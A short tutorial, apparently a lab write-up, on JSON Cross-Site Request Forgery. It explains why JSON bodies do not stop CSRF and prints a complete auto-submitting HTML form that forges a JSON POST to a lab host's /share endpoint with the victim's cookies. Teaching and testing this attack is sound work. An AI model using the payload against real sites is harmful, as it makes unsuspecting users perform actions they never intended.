json-cross-site-request-forgery-json-csrf

JSON Cross-Site Request Forgery (JSON CSRF)

JSON Cross-Site Request Forgery occurs when a web application accepts JSON-formatted requests but does not properly validate CSRF protections, allowing an attacker to force an authenticated user to perform unintended actions.

Many developers incorrectly assume that using JSON automatically prevents CSRF — this is false.

Why JSON does NOT prevent CSRF

Browsers can send arbitrary POST bodies using HTML forms
Servers may:
- Ignore Content-Type
- Automatically parse malformed JSON
Cookies are automatically included in cross-site requests
Older browsers or missing SameSite enforcement worsen the issue

Exploitation technique

HTML forms can be abused to inject JSON by breaking attribute boundaries.

Malicious CSRF payload (json data trick)

<html>
  <body onload="document.getElementById('csrf').submit()">
    <form id="csrf"
          action="http://ptl-2166d1e9eab7-77041099edee.libcurl.me/share"
          method="POST"
          enctype="text/plain">

      <input name='{"user":"test","id":0,"fake":"' value='"}'>

    </form>
  </body>
</html>

How this works

Browser sends request body as:

{"user":"test","id":0,"fake":""}

Server:
- Parses JSON successfully
- Uses victim’s cookies
- Executes the action

Victim unknowingly performs the request

JSON Cross-Site Request Forgery (JSON CSRF)​

Why JSON does NOT prevent CSRF​

Exploitation technique​

How this works​

JSON Cross-Site Request Forgery (JSON CSRF)

Why JSON does NOT prevent CSRF

Exploitation technique

How this works